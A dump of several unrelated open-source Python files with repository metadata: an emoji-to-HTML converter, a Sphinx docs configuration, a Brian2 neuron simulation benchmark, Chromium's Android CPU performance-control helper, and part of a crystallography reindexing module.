'railway_car', 'rainbow', 'raised_hand', 'raised_hands', 'raising_hand',
'ram', 'ramen', 'rat', 'recycle', 'red_car', 'red_circle', 'registered',
'relaxed', 'relieved', 'repeat', 'repeat_one', 'restroom',
'revolving_hearts', 'rewind', 'ribbon', 'rice', 'rice_ball',
'rice_cracker', 'rice_scene', 'ring', 'rocket', 'roller_coaster',
'rooster', 'rose', 'rotating_light', 'round_pushpin', 'rowboat', 'ru',
'rugby_football', 'runner', 'running', 'running_shirt_with_sash', 'sa',
'sagittarius', 'sailboat', 'sake', 'sandal', 'santa', 'satellite',
'satisfied', 'saxophone', 'school', 'school_satchel', 'scissors',
'scorpius', 'scream', 'scream_cat', 'scroll', 'seat', 'secret',
'see_no_evil', 'seedling', 'seven', 'shaved_ice', 'sheep', 'shell', 'ship',
'shipit', 'shirt', 'shit', 'shoe', 'shower', 'signal_strength',
'simple_smile', 'six', 'six_pointed_star', 'ski', 'skull', 'sleeping',
'sleepy', 'slot_machine', 'small_blue_diamond', 'small_orange_diamond',
'small_red_triangle', 'small_red_triangle_down', 'smile', 'smile_cat',
'smiley', 'smiley_cat', 'smiling_imp', 'smirk', 'smirk_cat', 'smoking',
'snail', 'snake', 'snowboarder', 'snowflake', 'snowman', 'sob', 'soccer',
'soon', 'sos', 'sound', 'space_invader', 'spades', 'spaghetti', 'sparkle',
'sparkler', 'sparkles', 'sparkling_heart', 'speak_no_evil', 'speaker',
'speech_balloon', 'speedboat', 'squirrel', 'star', 'star2', 'stars',
'station', 'statue_of_liberty', 'steam_locomotive', 'stew',
'straight_ruler', 'strawberry', 'stuck_out_tongue',
'stuck_out_tongue_closed_eyes', 'stuck_out_tongue_winking_eye',
'sun_with_face', 'sunflower', 'sunglasses', 'sunny', 'sunrise',
'sunrise_over_mountains', 'surfer', 'sushi', 'suspect',
'suspension_railway', 'sweat', 'sweat_drops', 'sweat_smile',
'sweet_potato', 'swimmer', 'symbols', 'syringe', 'tada', 'tanabata_tree',
'tangerine', 'taurus', 'taxi', 'tea', 'telephone', 'telephone_receiver',
'telescope', 'tennis', 'tent', 'thought_balloon', 'three', 'thumbsdown',
'thumbsup', 'ticket', 'tiger', 'tiger2', 'tired_face', 'tm', 'toilet',
'tokyo_tower', 'tomato', 'tongue', 'top', 'tophat', 'tractor',
'traffic_light', 'train', 'train2', 'tram', 'triangular_flag_on_post',
'triangular_ruler', 'trident', 'triumph', 'trolleybus', 'trollface',
'trophy', 'tropical_drink', 'tropical_fish', 'truck', 'trumpet', 'tshirt',
'tulip', 'turtle', 'tv', 'twisted_rightwards_arrows', 'two', 'two_hearts',
'two_men_holding_hands', 'two_women_holding_hands', 'u5272', 'u5408',
'u55b6', 'u6307', 'u6708', 'u6709', 'u6e80', 'u7121', 'u7533', 'u7981',
'u7a7a', 'uk', 'umbrella', 'unamused', 'underage', 'unlock', 'up', 'us',
'v', 'vertical_traffic_light', 'vhs', 'vibration_mode', 'video_camera',
'video_game', 'violin', 'virgo', 'volcano', 'vs', 'walking',
'waning_crescent_moon', 'waning_gibbous_moon', 'warning', 'watch',
'water_buffalo', 'watermelon', 'wave', 'wavy_dash', 'waxing_crescent_moon',
'waxing_gibbous_moon', 'wc', 'weary', 'wedding', 'whale', 'whale2',
'wheelchair', 'white_check_mark', 'white_circle', 'white_flower',
'white_large_square', 'white_medium_small_square', 'white_medium_square',
'white_small_square', 'white_square_button', 'wind_chime', 'wine_glass',
'wink', 'wolf', 'woman', 'womans_clothes', 'womans_hat', 'womens',
'worried', 'wrench', 'x', 'yellow_heart', 'yen', 'yum', 'zap', 'zero',
'zzz']
# def main(input_obj=None, output_obj=None, emoji_dir=None):
# """Invoke most common usage of the library."""
# handler = InjectEmoji(input_obj, output_obj, emoji_dir)
# return handler.main()
class InjectEmoji(object):
"""Replace emoji notations with HTML image tags."""
def __init__(self, input_obj=None, output_obj=None, emoji_dir=None):
"""
Set up the InjectEmoji object.
Args:
input_obj (FileObject): source to .readline() from.
Defaults to sys.stdin.
output_obj (FileObject): destination to .write() to.
Defaults to sys.stdout.
emoji_dir (str): Path to alternate emoji directory.
Overrides INJECT_EMOJI_DIR env variable. Defaults
to bundled emoji directory.
"""
if input_obj:
self._input = input_obj
else:
self._input = sys.stdin
if output_obj:
self._output = output_obj
else:
self._output = sys.stdout
self._use_bundled_emoji = True
        if emoji_dir:
            # An explicitly passed directory also overrides the bundled list
            self._emoji_dir = emoji_dir
            self._use_bundled_emoji = False
else:
self._emoji_dir = os.environ.get(
'INJECT_EMOJI_DIR', None)
if self._emoji_dir is None:
self._emoji_dir = os.path.join(
os.path.dirname(os.path.dirname(os.path.realpath(__file__))),
'emojis')
else:
self._use_bundled_emoji = False
self._pattern = None
def compile_pattern(self):
"""Compile re pattern from emoji directory listing."""
if self._use_bundled_emoji:
options = BUNDLED_EMOJI
else:
image_files = os.listdir(self._emoji_dir)
options = [x.replace('-', r'\-')
.replace('+', r'\+')[0:-4] for x in image_files]
self._pattern = re.compile(r'(?<!`)(:(' + r'|'.join(options) +
r'):)(?!`)')
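    # Example (sketch): the (?<!`) and (?!`) guards skip codes quoted in
    # backticks:
    #
    #   handler = InjectEmoji()
    #   handler.compile_pattern()
    #   handler._pattern.search('I :smile: a lot')      # matches
    #   handler._pattern.search('literal `:smile:`')    # no match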
def main(self):
"""Read from the input, write modified string to output."""
self.compile_pattern()
for line in self._input:
line = self._pattern.sub(
r'<img class="\2" title="\1" alt="\1" src="file://' +
self._emoji_dir +
r'/\2.png" height="20" width="20" align="absmiddle">', line)
self._output.write(line)
self._output.flush()
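# Example (sketch): driving the class with in-memory streams instead of the
# default stdin/stdout:
#
#   import io
#
#   src = io.StringIO(u':ship: it :shipit:\n')
#   dst = io.StringIO()
#   InjectEmoji(src, dst).main()
#   html = dst.getvalue()  # emoji codes replaced with <img> tags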
if __name__ == '__main__':
sys.exit(InjectEmoji(sys.stdin, sys.stdout).main())
|
claylo/inject-emoji
|
inject_emoji/inject_emoji.py
|
Python
|
mit
| 15,077
|
[
"Bowtie",
"Octopus"
] |
b274baea76c1f2257acd8affdc348ef0683cddd6cebefa7d39c3ab0429abe13b
|
# -*- coding: utf-8 -*-
#
# firefly-twisted documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 29 11:56:48 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'firefly-twisted'
copyright = u'2014, firefly'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0.0.'
# The full version, including alpha/beta/rc tags.
release = '1.0.0.'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'firefly-twisteddoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'firefly-twisted.tex', u'firefly-twisted Documentation',
u'firefly', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'firefly-twisted', u'firefly-twisted Documentation',
[u'firefly'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'firefly-twisted', u'firefly-twisted Documentation',
u'firefly', 'firefly-twisted', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'firefly-twisted'
epub_author = u'firefly'
epub_publisher = u'firefly'
epub_copyright = u'2014, firefly'
# The basename for the epub file. It defaults to the project name.
#epub_basename = u'firefly-twisted'
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
#epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the PIL.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
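# A hedged sketch (not in the original conf.py): intersphinx also accepts the
# named-key form, which scopes cross-references per project; the URLs below
# are illustrative only.
#intersphinx_mapping = {
#    'python': ('http://docs.python.org/', None),
#    'twisted': ('http://twistedmatrix.com/documents/current/api/', None),
#}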
|
yangdw/PyRepo
|
src/annotation/Firefly/docs/source/conf.py
|
Python
|
mit
| 10,603
|
[
"Firefly"
] |
bda5045d7e3b289ea77090936be397a7ecd62c90047990e76d7b0b764a5ade00
|
"""
# Notes:
- This simulation seeks to emulate the COBAHH benchmark simulations of (Brette
et al. 2007) using the Brian2 simulator for speed benchmark comparison to
DynaSim. However, this simulation does NOT include synapses, for better
comparison to Figure 5 of (Goodman and Brette, 2008) - although it uses the
COBAHH model of (Brette et al. 2007), not CUBA.
- The time taken to simulate will be indicated in the stdout log file
'~/batchdirs/brian_benchmark_COBAHH_nosyn_1/pbsout/brian_benchmark_COBAHH_nosyn_1.out'
- Note that this code has been slightly modified from the original (Brette et
al. 2007) benchmarking code, available here on ModelDB:
https://senselab.med.yale.edu/modeldb/showModel.cshtml?model=83319
in order to work with version 2 of the Brian simulator (aka Brian2), and also
modified to change the model being benchmarked, etc.
# References:
- Brette R, Rudolph M, Carnevale T, Hines M, Beeman D, Bower JM, et al.
Simulation of networks of spiking neurons: A review of tools and strategies.
Journal of Computational Neuroscience 2007;23:349–98.
doi:10.1007/s10827-007-0038-6.
- Goodman D, Brette R. Brian: a simulator for spiking neural networks in Python.
Frontiers in Neuroinformatics 2008;2. doi:10.3389/neuro.11.005.2008.
"""
from brian2 import *
# Parameters
cells = 1
defaultclock.dt = 0.01*ms
area = 20000*umetre**2
Cm = (1*ufarad*cmetre**-2) * area
gl = (5e-5*siemens*cmetre**-2) * area
El = -60*mV
EK = -90*mV
ENa = 50*mV
g_na = (100*msiemens*cmetre**-2) * area
g_kd = (30*msiemens*cmetre**-2) * area
VT = -63*mV
# # Time constants
# taue = 5*ms
# taui = 10*ms
# # Reversal potentials
# Ee = 0*mV
# Ei = -80*mV
# we = 6*nS # excitatory synaptic weight
# wi = 67*nS # inhibitory synaptic weight
# The model
eqs = Equations('''
dv/dt = (gl*(El-v)-
g_na*(m*m*m)*h*(v-ENa)-
g_kd*(n*n*n*n)*(v-EK))/Cm : volt
dm/dt = alpha_m*(1-m)-beta_m*m : 1
dn/dt = alpha_n*(1-n)-beta_n*n : 1
dh/dt = alpha_h*(1-h)-beta_h*h : 1
alpha_m = 0.32*(mV**-1)*(13*mV-v+VT)/
(exp((13*mV-v+VT)/(4*mV))-1.)/ms : Hz
beta_m = 0.28*(mV**-1)*(v-VT-40*mV)/
(exp((v-VT-40*mV)/(5*mV))-1)/ms : Hz
alpha_h = 0.128*exp((17*mV-v+VT)/(18*mV))/ms : Hz
beta_h = 4./(1+exp((40*mV-v+VT)/(5*mV)))/ms : Hz
alpha_n = 0.032*(mV**-1)*(15*mV-v+VT)/
(exp((15*mV-v+VT)/(5*mV))-1.)/ms : Hz
beta_n = .5*exp((10*mV-v+VT)/(40*mV))/ms : Hz
''')
# dv/dt = (gl*(El-v)+ge*(Ee-v)+gi*(Ei-v)-
# dge/dt = -ge*(1./taue) : siemens
# dgi/dt = -gi*(1./taui) : siemens
P = NeuronGroup(cells, model=eqs, threshold='v>-20*mV', refractory=3*ms,
method='euler')
# proportion=int(0.8*cells)
# Pe = P[:proportion]
# Pi = P[proportion:]
# Ce = Synapses(Pe, P, on_pre='ge+=we')
# Ci = Synapses(Pi, P, on_pre='gi+=wi')
# Ce.connect(p=0.98)
# Ci.connect(p=0.98)
# Initialization
P.v = 'El + (randn() * 5 - 5)*mV'
# P.ge = '(randn() * 1.5 + 4) * 10.*nS'
# P.gi = '(randn() * 12 + 20) * 10.*nS'
# Record a few traces
trace = StateMonitor(P, 'v', record=[0])  # with cells = 1, only neuron 0 exists
totaldata = StateMonitor(P, 'v', record=True)
run(0.5 * second, report='text')
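# Optional timing sketch (not part of the original benchmark; the canonical
# timing is the PBS stdout log named in the header docstring). Wrapping the
# run() call above with the standard library would look like:
# import time
# t0 = time.time()
# run(0.5 * second, report='text')
# print('wall-clock simulation time: %.2f s' % (time.time() - t0))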
# plot(trace.t/ms, trace[1].v/mV)
# plot(trace.t/ms, trace[10].v/mV)
# plot(trace.t/ms, trace[100].v/mV)
# xlabel('t (ms)')
# ylabel('v (mV)')
# show()
# print("Saving TC cell voltages!")
# numpy.savetxt("foo_totaldata.csv", totaldata.v/mV, delimiter=",")
|
asoplata/dynasim-benchmark-brette-2007
|
output/Brian2/brian2_benchmark_COBAHH_nosyn_0001/brian2_benchmark_COBAHH_nosyn_0001.py
|
Python
|
gpl-3.0
| 3,349
|
[
"Brian"
] |
501c066e037a65401ae8e132adebe9cd6f1fc3e41d91c32992cff16cf4ee6733
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
from pylib import android_commands
from pylib.device import device_utils
class PerfControl(object):
"""Provides methods for setting the performance mode of a device."""
_SCALING_GOVERNOR_FMT = (
'/sys/devices/system/cpu/cpu%d/cpufreq/scaling_governor')
_CPU_ONLINE_FMT = '/sys/devices/system/cpu/cpu%d/online'
_KERNEL_MAX = '/sys/devices/system/cpu/kernel_max'
def __init__(self, device):
# TODO(jbudorick) Remove once telemetry gets switched over.
if isinstance(device, android_commands.AndroidCommands):
device = device_utils.DeviceUtils(device)
self._device = device
cpu_files = self._device.RunShellCommand(
'ls -d /sys/devices/system/cpu/cpu[0-9]*')
self._num_cpu_cores = len(cpu_files)
assert self._num_cpu_cores > 0, 'Failed to detect CPUs.'
logging.info('Number of CPUs: %d', self._num_cpu_cores)
self._have_mpdecision = self._device.FileExists('/system/bin/mpdecision')
def SetHighPerfMode(self):
# TODO(epenner): Enable on all devices (http://crbug.com/383566)
if 'Nexus 4' == self._device.old_interface.GetProductModel():
self._ForceAllCpusOnline(True)
if not self._AllCpusAreOnline():
logging.warning('Failed to force CPUs online. Results may be noisy!')
self._SetScalingGovernorInternal('performance')
def SetPerfProfilingMode(self):
"""Sets the highest possible performance mode for the device."""
self._ForceAllCpusOnline(True)
self._SetScalingGovernorInternal('performance')
if not self._AllCpusAreOnline():
if not self._device.old_interface.IsRootEnabled():
raise RuntimeError('Need root to force CPUs online.')
raise RuntimeError('Failed to force CPUs online.')
def SetDefaultPerfMode(self):
"""Sets the performance mode for the device to its default mode."""
product_model = self._device.GetProp('ro.product.model')
governor_mode = {
'GT-I9300': 'pegasusq',
'Galaxy Nexus': 'interactive',
'Nexus 4': 'ondemand',
'Nexus 7': 'interactive',
'Nexus 10': 'interactive'
}.get(product_model, 'ondemand')
self._SetScalingGovernorInternal(governor_mode)
self._ForceAllCpusOnline(False)
def _SetScalingGovernorInternal(self, value):
for cpu in range(self._num_cpu_cores):
scaling_governor_file = PerfControl._SCALING_GOVERNOR_FMT % cpu
if self._device.FileExists(scaling_governor_file):
logging.info('Writing scaling governor mode \'%s\' -> %s',
value, scaling_governor_file)
self._device.WriteFile(scaling_governor_file, value, as_root=True)
def _AllCpusAreOnline(self):
for cpu in range(self._num_cpu_cores):
online_path = PerfControl._CPU_ONLINE_FMT % cpu
if self._device.ReadFile(online_path)[0] == '0':
return False
return True
def _ForceAllCpusOnline(self, force_online):
"""Enable all CPUs on a device.
Some vendors (or only Qualcomm?) hot-plug their CPUs, which can add noise
to measurements:
- In perf, samples are only taken for the CPUs that are online when the
measurement is started.
- The scaling governor can't be set for an offline CPU and frequency scaling
on newly enabled CPUs adds noise to both perf and tracing measurements.
It appears Qualcomm is the only vendor that hot-plugs CPUs, and on Qualcomm
this is done by "mpdecision".
"""
if self._have_mpdecision:
script = 'stop mpdecision' if force_online else 'start mpdecision'
self._device.RunShellCommand(script, as_root=True)
if not self._have_mpdecision and not self._AllCpusAreOnline():
logging.warning('Unexpected cpu hot plugging detected.')
if not force_online:
return
for cpu in range(self._num_cpu_cores):
online_path = PerfControl._CPU_ONLINE_FMT % cpu
self._device.WriteFile(online_path, '1', as_root=True)
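# A minimal usage sketch (hypothetical device serial; assumes the Chromium
# pylib environment is importable). Not part of the original module:
#
#   device = device_utils.DeviceUtils('0123456789abcdef')
#   perf = PerfControl(device)
#   perf.SetHighPerfMode()
#   try:
#       pass  # ... run the measurement here ...
#   finally:
#       perf.SetDefaultPerfMode()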
|
appknox/xysec_adb
|
xysec_adb/pylib/perf/perf_control.py
|
Python
|
apache-2.0
| 4,074
|
[
"Galaxy"
] |
9418b0616f310a8ea99322c4b50bfded5c8a447686d10841dc6a34035f36b2f7
|
"""
(c) RIKEN 2015. All rights reserved.
Author: Keitaro Yamashita
This software is released under the new BSD License; see LICENSE.
"""
from yamtbx.dataproc.xds.xds_ascii import XDS_ASCII
from yamtbx.util.xtal import format_unit_cell
from cctbx import crystal
from cctbx.crystal import reindex
from cctbx.array_family import flex
from cctbx import sgtbx
from libtbx.utils import null_out
from libtbx import easy_mp
from libtbx import adopt_init_args
from cctbx.merging import brehm_diederichs
import os
import copy
import multiprocessing
import time
import numpy
def calc_cc(a1, a2):
a1, a2 = a1.common_sets(a2, assert_is_similar_symmetry=False)
corr = flex.linear_correlation(a1.data(), a2.data())
if corr.is_well_defined():# and a1.size() > 20:
return corr.coefficient()
else:
return float("nan")
# calc_cc()
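# Illustrative note (not in the original): for two arrays sharing reflections,
# calc_cc() returns Pearson's r over the common set of observations, and nan
# when the correlation is not well defined (e.g. too few common reflections).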
class ReindexResolver:
def __init__(self, xac_files, d_min=3, min_ios=3, nproc=1, max_delta=5, log_out=null_out()):
adopt_init_args(self, locals())
self.arrays = []
self.best_operators = None
self._representative_xs = None
self.bad_files = []
# __init__()
def representative_crystal_symmetry(self): return self._representative_xs
def read_xac_files(self, from_p1=False):
op_to_p1 = None
if from_p1:
"""
This option is currently for multi_determine_symmetry.
Do not use this for ambiguity resolution! op_to_p1 is not considered when writing new HKL files.
"""
self.log_out.write("\nAveraging symmetry of all inputs..\n")
cells = []
sgs = []
for f in self.xac_files:
xac = XDS_ASCII(f, read_data=False)
cells.append(xac.symm.unit_cell().parameters())
sgs.append(xac.symm.space_group())
assert len(set(sgs)) < 2
avg_symm = crystal.symmetry(list(numpy.median(cells, axis=0)), space_group=sgs[0])
op_to_p1 = avg_symm.change_of_basis_op_to_niggli_cell()
self.log_out.write(" Averaged symmetry: %s (%s)\n" % (format_unit_cell(avg_symm.unit_cell()), sgs[0].info()))
self.log_out.write(" Operator to Niggli cell: %s\n" % op_to_p1.as_hkl())
self.log_out.write(" Niggli cell: %s\n" % format_unit_cell(avg_symm.unit_cell().change_basis(op_to_p1)))
print >>self.log_out, "\nReading"
cells = []
bad_files, good_files = [], []
for i, f in enumerate(self.xac_files):
print >>self.log_out, "%4d %s" % (i, f)
xac = XDS_ASCII(f, i_only=True)
self.log_out.write(" d_range: %6.2f - %5.2f" % xac.i_obs().resolution_range())
self.log_out.write(" n_ref=%6d" % xac.i_obs().size())
xac.remove_rejected()
a = xac.i_obs().resolution_filter(d_min=self.d_min)
if self.min_ios is not None: a = a.select(a.data()/a.sigmas()>=self.min_ios)
self.log_out.write(" n_ref_filtered=%6d" % a.size())
if from_p1:
a = a.change_basis(op_to_p1).customized_copy(space_group_info=sgtbx.space_group_info("P1"))
a = a.as_non_anomalous_array().merge_equivalents(use_internal_variance=False).array()
self.log_out.write(" n_ref_merged=%6d\n" % a.size())
if a.size() < 2:
self.log_out.write(" !! WARNING !! number of reflections is dangerously small!!\n")
bad_files.append(f)
else:
self.arrays.append(a)
cells.append(a.unit_cell().parameters())
good_files.append(f)
if bad_files:
self.xac_files = good_files
self.bad_files = bad_files
assert len(self.xac_files) == len(self.arrays) == len(cells)
print >>self.log_out, ""
self._representative_xs = crystal.symmetry(list(numpy.median(cells, axis=0)),
space_group_info=self.arrays[0].space_group_info())
# read_xac_files()
def show_assign_summary(self, log_out=None):
if not log_out: log_out = self.log_out
if not self.best_operators:
log_out.write("ERROR: Operators not assigned.\n")
return
unique_ops = set(self.best_operators)
op_count = map(lambda x: (x, self.best_operators.count(x)), unique_ops)
op_count.sort(key=lambda x: x[1])
log_out.write("Assigned operators:\n")
for op, num in reversed(op_count):
log_out.write(" %10s: %4d\n" % (op.as_hkl(), num))
log_out.write("\n")
# show_assign_summary()
def find_reindex_ops(self):
symm = self.representative_crystal_symmetry()
cosets = reindex.reindexing_operators(symm, symm, max_delta=self.max_delta)
reidx_ops = cosets.combined_cb_ops()
return reidx_ops
# find_reindex_ops()
def modify_xds_ascii_files(self, suffix="_reidx", cells_dat_out=None):
#ofs_lst = open("for_merge_new.lst", "w")
if cells_dat_out: cells_dat_out.write("file a b c al be ga\n")
new_files = []
print >>self.log_out, "Writing reindexed files.."
assert len(self.xac_files) == len(self.best_operators)
for i, (f, op) in enumerate(zip(self.xac_files, self.best_operators)):
xac = XDS_ASCII(f, read_data=False)
if op.is_identity_op():
new_files.append(f)
if cells_dat_out:
cell = xac.symm.unit_cell().parameters()
cells_dat_out.write(f+" "+" ".join(map(lambda x:"%7.3f"%x, cell))+"\n")
continue
newf = f.replace(".HKL", suffix+".HKL") if ".HKL" in f else os.path.splitext(f)[0]+suffix+".HKL"
print >>self.log_out, "%4d %s" % (i, newf)
cell_tr = xac.write_reindexed(op, newf, space_group=self.arrays[0].crystal_symmetry().space_group())
#ofs_lst.write(newf+"\n")
new_files.append(newf)
if cells_dat_out:
cells_dat_out.write(newf+" "+" ".join(map(lambda x:"%7.3f"%x, cell_tr.parameters()))+"\n")
return new_files
# modify_xds_ascii_files()
def debug_write_mtz(self):
arrays = self.arrays
merge_org = arrays[0].deep_copy()
for a in arrays[1:]: merge_org = merge_org.concatenate(a, assert_is_similar_symmetry=False)
merge_org = merge_org.merge_equivalents(use_internal_variance=False).array()
merge_org.as_mtz_dataset(column_root_label="I").mtz_object().write(file_name="noreindex.mtz")
merge_new = None
for a, op in zip(arrays, self.best_operators):
if not op.is_identity_op(): a = a.customized_copy(indices=op.apply(a.indices()))
if merge_new is None: merge_new = a
else: merge_new = merge_new.concatenate(a, assert_is_similar_symmetry=False)
merge_new = merge_new.merge_equivalents(use_internal_variance=False).array()
merge_new.as_mtz_dataset(column_root_label="I").mtz_object().write(file_name="reindexed.mtz")
# debug_write_mtz()
# class ReindexResolver
def kabsch_selective_breeding_worker(args):
ref, i, tmp, new_ops = args
global kabsch_selective_breeding_worker_dict
nproc = kabsch_selective_breeding_worker_dict["nproc"]
arrays = kabsch_selective_breeding_worker_dict["arrays"]
reindexed_arrays = kabsch_selective_breeding_worker_dict["reindexed_arrays"]
reidx_ops = kabsch_selective_breeding_worker_dict["reidx_ops"]
if ref==i: return None
if nproc > 1:
tmp2 = reindexed_arrays[new_ops[ref]][ref]
else:
if reidx_ops[new_ops[ref]].is_identity_op(): tmp2 = arrays[ref]
else: tmp2 = arrays[ref].customized_copy(indices=reidx_ops[new_ops[ref]].apply(arrays[ref].indices())).map_to_asu()
cc = calc_cc(tmp, tmp2)
if cc==cc: return cc
return None
# work_local()
class KabschSelectiveBreeding(ReindexResolver):
"""
Reference: W. Kabsch "Processing of X-ray snapshots from crystals in random orientations" Acta Cryst. (2014). D70, 2204-2216
http://dx.doi.org/10.1107/S1399004714013534
If I understand correctly...
"""
def __init__(self, xac_files, d_min=3, min_ios=3, nproc=1, max_delta=5, from_p1=False, log_out=null_out()):
ReindexResolver.__init__(self, xac_files, d_min, min_ios, nproc, max_delta, log_out)
self._final_cc_means = [] # list of [(op_index, cc_mean), ...]
self._reidx_ops = []
self.read_xac_files(from_p1=from_p1)
# __init__()
def final_cc_means(self): return self._final_cc_means
def reindex_operators(self): return self._reidx_ops
def assign_operators(self, reidx_ops=None, max_cycle=100):
arrays = self.arrays
self.best_operators = None
if reidx_ops is None: reidx_ops = self.find_reindex_ops()
print >>self.log_out, "Reindex operators:"
for i, op in enumerate(reidx_ops): print >>self.log_out, " %2d: %s" % (i, op.as_hkl())
print >>self.log_out, ""
